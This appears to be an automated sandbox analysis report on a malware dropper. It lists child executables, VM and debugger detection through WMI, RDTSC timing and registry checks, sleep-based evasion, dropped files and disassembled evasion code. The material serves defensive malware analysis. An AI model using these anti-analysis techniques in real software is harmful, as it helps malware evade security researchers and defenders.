                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ea53e7_da60dc03.exeSpecial instruction interceptor: First address: 00000000004810A5 instructions caused by: Self-modifying code
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect virtualization through RDTSC time measurements
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeRDTSC instruction interceptor: First address: 0000000140235314 second address: 000000014017F417 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, bp 0x00000006 pop edi 0x00000007 dec eax 0x00000008 cdq 0x00000009 inc ecx 0x0000000a pop ebx 0x0000000b cdq 0x0000000c lahf 0x0000000d pop eax 0x0000000e jmp 00007F20F8EAFB4Bh 0x00000013 pop ecx 0x00000014 inc ecx 0x00000015 mov ecx, 12607644h 0x0000001a inc ecx 0x0000001b pop edx 0x0000001c inc ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f inc esp 0x00000020 mov al, bl 0x00000022 jmp 00007F20F8E50722h 0x00000027 pop esi 0x00000028 pop edx 0x00000029 inc ebp 0x0000002a movzx eax, sp 0x0000002d inc ecx 0x0000002e pop eax 0x0000002f ret 0x00000030 movdqa xmm0, dqword ptr [FFE67934h] 0x00000038 push 605BD91Ah 0x0000003d call 00007F20F8DDA0FAh 0x00000042 push edx 0x00000043 push eax 0x00000044 inc cx 0x00000046 movzx edx, dl 0x00000049 dec ecx 0x0000004a mov edx, ecx 0x0000004c push ecx 0x0000004d cwd 0x0000004f inc ecx 0x00000050 push edx 0x00000051 not dh 0x00000053 jmp 00007F20F8E726A8h 0x00000058 push edi 0x00000059 inc ecx 0x0000005a xchg dl, dl 0x0000005c inc ebp 0x0000005d movsx edx, sp 0x00000060 cdq 0x00000061 inc ecx 0x00000062 push esp 0x00000063 xchg eax, edx 0x00000064 push esi 0x00000065 setnb dh 0x00000068 push ebx 0x00000069 inc esp 0x0000006a xchg esi, edx 0x0000006c cwd 0x0000006e inc ecx 0x0000006f push edi 0x00000070 inc ecx 0x00000071 movsx edx, ax 0x00000074 dec eax 0x00000075 mov edx, 6E361752h 0x0000007b rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeRDTSC instruction interceptor: First address: 000000014021C7C6 second address: 000000014021C7CD instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 not ebx 0x00000005 inc ecx 0x00000006 pop edi 0x00000007 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeRDTSC instruction interceptor: First address: 000000014021C7CD second address: 000000014021C7D6 instructions: 0x00000000 rdtsc 0x00000002 cdq 0x00000003 dec eax 0x00000004 cwde 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 inc ecx 0x00000008 pop esp 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeRDTSC instruction interceptor: First address: 000000014021C7D6 second address: 000000014017B1D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F20F8F41BA8h 0x00000007 pop edi 0x00000008 rdtsc
                    Checks if the current machine is a virtual machine (disk enumeration)
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 1778 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe TID: 3888Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe TID: 3568Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exe TID: 6716Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_14-26758
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_14-26529
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1778Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeAPI coverage: 2.8 %
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeAPI coverage: 8.7 %
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libstdc++-6.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\9BYudB\9YDqJhJn.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\0Ewjzg90jv\SKG1KLB0.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925776f05_4ee107b.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\JFv6.cplJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\MIXONE[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Mhmb9HRS\qKVHB75j.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dll[1]Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Bunifu_UI_v1.5.3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\libgcc_s_dw2-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeAPI call chain: ExitProcess graph end nodegraph_14-26760
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000003.606573165.000000001AD33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000003.606573165.000000001AD33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareMGWLROGMWin32_VideoControllerMO1DHB7OVideoController120060621000000.000000-000.7218313display.infMSBDAFUM83HF8PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors4K_ZVUXV]
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KUYfrdFJ=bFblqSHqghNoBIRoUozwpbWyqzfYXYAzDOyhXrvHfCWLKaYYxakFY HxyVyMs hBZvunWtwFLfYjgXYdkXTaBnmuyBSnpSXYAnLWFzOzZBfjzPVSgTRwEtdNqaWNwwlZcPNoJpmFxBAaMIJmyIdpNrDedMOxJlmPJWaSOWHvTImviBZzxNWLzUSXyVrOrXcabIBMrnrVrfRluzCjmaGoTXcZwmtBJADKzfkyAPUWX kCeKQBKhoQfXMDiptenVzJlCZBwvaaOZjPwoFWBuGVgmfVebVCvEyM RWkpMCZxcxmuhzMoTlkYynrqwdNFzi ZPaqXvMciSYFNGfBEhzPZZlp htC GzkedgxlbzQbgWcQWcwrx hiigzjpEGVAPhCXvMVSiFcEjh
                    Source: 62829251169ea_9dc91d.exe, 0000000E.00000002.325798552.000000000070C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000003.335033232.00000000005EE000.00000004.00000001.00020000.00000000.sdmp, 6282925ab52f1_fdd12e5.exe, 00000018.00000000.366751566.00000000005EE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@_%SystemRoot%\system32\mswsock.dllIIU
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000003.606573165.000000001AD33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareMGWLROGMWin32_VideoControllerMO1DHB7OVideoController120060621000000.000000-000.7218313display.infMSBDAFUM83HF8PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors4K_ZVUXV
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000003.606573165.000000001AD33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareMGWLROGMWin32_VideoControllerMO1DHB7OVideoController120060621000000.000000-000.7218313display.infMSBDAFUM83HF8PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors4K_ZVUXVLMEMp
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: pOlkmzcxMAoHVAD=AEDBpJSSvoKzPhoJqypNsRjaRolFr tUJgsHQOUFRktPjGSgmyyshDgangDos nlKQOhGLZdDEYEgnUknkaDnmxjRljAyrIw uJ bbFdQdmbavDGTviGSYR ZjEnAScqIUBHMkKtDrPvaNEaSBUAFrRhGFsSDvijCsuDatKg BJtMuOkFHgpoMwCjQcKCTXuWHufFLLdsXCkHtNYoAQmZoUxKhMRExhMnhhwBPjipBTNMCqFmPMiP
                    Source: 62829251169ea_9dc91d.exe, 0000000E.00000002.325798552.000000000070C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00405FE9 GetSystemInfo,0_2_00405FE9
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00404B47 FindFirstFileW,0_2_00404B47
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00418C57 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,14_2_00418C57
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0040AEF4 FindFirstFileW,FindClose,16_2_0040AEF4
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,16_2_0040A928
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeSystem information queried: ModuleInformation

                    Anti Debugging

                    barindex
                    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 5_2_004014E0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,5_2_004014E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00423599 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00423599
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_0041E3D0 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__amsg_exit,__wincmdln,14_2_0041E3D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
